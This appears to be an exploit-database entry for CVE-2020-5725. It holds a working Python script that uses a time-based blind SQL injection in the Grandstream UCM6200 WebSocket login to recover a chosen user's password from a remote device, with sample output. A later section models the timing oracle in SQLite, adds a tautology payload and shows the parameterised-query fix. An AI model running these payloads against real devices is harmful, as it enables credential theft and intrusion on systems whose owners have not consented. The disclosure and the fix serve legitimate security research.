"Grandstream UCM6200 Series WebSocket 1.0.20.20 - 'user_password' SQL Injection"

Author: Jacob Baines
Platform: hardware
Release date: 2020-03-31

# Exploit Title: Grandstream UCM6200 Series WebSocket 1.0.20.20 - 'user_password' SQL Injection
# Date: 2020-03-30
# Exploit Author: Jacob Baines
# Vendor Homepage: http://www.grandstream.com/
# Software Link: http://www.grandstream.com/support/firmware/ucm62xx-official-firmware
# Version: 1.0.20.20 and below
# Tested on: Grandstream UCM6202 1.0.20.20
# CVE : CVE-2020-5725
# Grandstream UCM6200 Series WebSocket 1.0.20.20 SQL Injection Password Disclosure via Login (time based)
# Advisory: https://www.tenable.com/security/research/tra-2020-17
# Sample output:
#
# albinolobster@ubuntu:~$ python3 websockify_login_injection.py --rhost 192.168.2.1 --user lolwat
# [+] Password length is 9
# [+] Discovering password...
# LabPass1%
# [+] Done! The password is LabPass1%

import sys
import ssl
import time
import asyncio
import argparse
import websockets


async def password_guess(ip, port, username):

    # the path to exploit. The port comes from --rport (default 8089); the
    # original listing hard-coded 8089 here and ignored the flag.
    uri = 'wss://' + ip + ':' + str(port) + '/websockify'

    # no ssl verification (the device ships a self-signed certificate).
    # check_hostname must be disabled before verify_mode can be CERT_NONE.
    ssl_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ssl_context.check_hostname = False
    ssl_context.verify_mode = ssl.CERT_NONE

    # Determine the length of the password. The injected
    # RANDOMBLOB/HEX/UPPER/LIKE chain is expensive and sits to the right of
    # the LENGTH() test, so SQLite only evaluates it when the guess is true.
    # A reply slower than the 5 second threshold therefore means "correct".
    # The reply body itself never matters; only the round-trip time does.
    length = 0
    while length < 100:
        async with websockets.connect(uri, ssl=ssl_context) as websocket:
            start = time.time()
            login = ('{"type":"request","message":{"transactionid":"123456789zxa",'
                     '"action":"login","username":"' + username +
                     '\' AND LENGTH(user_password)==' + str(length) +
                     ' AND 88=LIKE(\'ABCDEFG\',UPPER(HEX(RANDOMBLOB(500000000/2))))'
                     ' or \'1\'=\'2","token":"lolwat"}}')
            await websocket.send(login)
            response = await websocket.recv()

            if (time.time() - start) < 5:
                length = length + 1
                continue
            else:
                break

    # if we hit max password length then we've done something wrong
    if (length == 100):
        print('[+] Couldn\'t determine the password\'s length.')
        sys.exit(1)

    print('[+] Password length is', length)
    print('[+] Discovering password...')

    # Now that we know the password length, guess one byte at a time until
    # we've reached the full length. Same 5 second threshold as above.
    # Both a LIKE prefix match and a substr() equality are injected: LIKE
    # alone would be fooled by '%' or '_' in the password (see the sample
    # output, where the password ends in '%').
    password = ''
    while len(password) < length:
        value = 0x20
        while value < 0x80:
            # '"' and '\' must be escaped so the JSON envelope stays valid.
            # 0x27 (single quote) is not escaped for SQL, so a password that
            # contains one will break the injected statement; the original
            # exploit has the same limitation.
            if value == 0x22 or value == 0x5c:
                temp_pass = password + '\\'
                temp_pass = temp_pass + chr(value)
            else:
                temp_pass = password + chr(value)

            temp_pass_len = len(temp_pass)

            start = time.time()

            async with websockets.connect(uri, ssl=ssl_context) as websocket:
                challenge = ('{"type":"request","message":{"transactionid":"123456789zxa",'
                             '"action":"login","username":"' + username +
                             '\' AND user_password LIKE \'' + temp_pass + '%\''
                             ' AND substr(user_password,1,' + str(temp_pass_len) + ') = \'' + temp_pass + '\''
                             ' AND 88=LIKE(\'ABCDEFG\',UPPER(HEX(RANDOMBLOB(500000000/2))))'
                             ' or \'1\'=\'2","token":"lolwat"}}')
                await websocket.send(challenge)
                response = await websocket.recv()

            if (time.time() - start) < 5:
                value = value + 1
                continue
            else:
                print('\r' + temp_pass, end='')
                password = temp_pass
                break

        if value == 0x80:
            print('')
            print('[-] Failed to determine the password.')
            sys.exit(1)

    print('')
    print('[+] Done! The password is', password)


top_parser = argparse.ArgumentParser(
    description='CVE-2020-5725: time-based SQL injection password disclosure via the UCM6200 websockify login')
top_parser.add_argument('--rhost', action="store", dest="rhost", required=True,
                        help="The remote host to connect to")
top_parser.add_argument('--rport', action="store", dest="rport", type=int,
                        help="The remote port to connect to", default=8089)
top_parser.add_argument('--user', action="store", dest="user", required=True,
                        help="The user to brute force")
args = top_parser.parse_args()

asyncio.run(password_guess(args.rhost, args.rport, args.user))
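To make the oracle and its fix concrete, the following is an added example, not Grandstream's code and not part of the exploit above. It models the login lookup against an in-memory SQLite table: the table schema, the `users` row and the `vulnerable_lookup` / `safe_lookup` handlers are assumptions, while the payload shape (LENGTH() test, then `88=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(...))))`, then `or '1'='2`) is taken from the exploit with the blob size scaled down so it runs in milliseconds rather than seconds. It shows why the timing side channel works (SQLite short-circuits AND, so the expensive expression only runs when the injected condition is true), and that the identical payload is inert once the username is bound as a query parameter instead of being spliced into the SQL text.

```python
import sqlite3
import time

# Constructed stand-in for the PBX user table. The schema and row are
# hypothetical; only the user_password column name comes from the exploit.
CONSTRUCTED_USER = ("lolwat", "LabPass1%")


def build_db():
    """Create an in-memory SQLite database holding one constructed user row."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (user_name TEXT, user_password TEXT)")
    con.execute("INSERT INTO users VALUES (?, ?)", CONSTRUCTED_USER)
    return con


def vulnerable_lookup(con, username):
    """Hypothetical vulnerable handler: the username is spliced into the SQL text."""
    sql = "SELECT user_password FROM users WHERE user_name = '" + username + "'"
    return con.execute(sql).fetchall()


def safe_lookup(con, username):
    """Hardened form: the username is bound as data and never parsed as SQL."""
    sql = "SELECT user_password FROM users WHERE user_name = ?"
    return con.execute(sql, (username,)).fetchall()


def length_probe(username, length, blob_bytes):
    """Build the exploit's first-stage payload with a configurable delay size.

    The RANDOMBLOB/HEX/UPPER/LIKE chain is to the right of the LENGTH() test,
    so SQLite evaluates it only when the length guess is true. LIKE() returns
    0 or 1, never 88, and the trailing "or '1'='2'" is false, so the query
    returns no rows either way: the only observable is elapsed time.
    """
    return (username + "' AND LENGTH(user_password)==" + str(length)
            + " AND 88=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB("
            + str(blob_bytes) + ")))) or '1'='2")


def timed(con, lookup, payload):
    """Run one lookup and return (rows, elapsed_seconds)."""
    start = time.perf_counter()
    rows = lookup(con, payload)
    return rows, time.perf_counter() - start


def blind_oracle_demo(blob_bytes=4_000_000):
    """Return (slow, fast, safe_rows).

    slow: vulnerable handler time for the correct length guess
    fast: best of five vulnerable handler times for a wrong length guess
    safe_rows: what the parameterised handler returns for the correct-guess payload
    """
    con = build_db()
    user, password = CONSTRUCTED_USER
    right = length_probe(user, len(password), blob_bytes)
    wrong = length_probe(user, len(password) + 1, blob_bytes)
    _, slow = timed(con, vulnerable_lookup, right)
    fast = min(timed(con, vulnerable_lookup, wrong)[1] for _ in range(5))
    safe_rows, _ = timed(con, safe_lookup, right)
    return slow, fast, safe_rows


def boolean_bypass_demo():
    """Classic tautology payload: the vulnerable handler leaks every row, the
    parameterised handler looks for a literal user named "lolwat' OR '1'='1"."""
    con = build_db()
    payload = "lolwat' OR '1'='1"
    return vulnerable_lookup(con, payload), safe_lookup(con, payload)


if __name__ == "__main__":
    slow, fast, safe_rows = blind_oracle_demo()
    print(f"correct length guess: {slow * 1000:.1f} ms, wrong guess: {fast * 1000:.3f} ms")
    print("parameterised handler, same payload:", safe_rows)
    leaked, clean = boolean_bypass_demo()
    print("tautology payload -> vulnerable:", leaked, "parameterised:", clean)
```

Running it prints a correct-guess time that is orders of magnitude above the wrong-guess time, which is exactly the signal the exploit thresholds at 5 seconds with its 250 MB blob, and shows the parameterised handler returning nothing for both the timing payload and the tautology payload. The fix on the device side is the same as in `safe_lookup`: bind the WebSocket login fields as parameters rather than concatenating them into the statement.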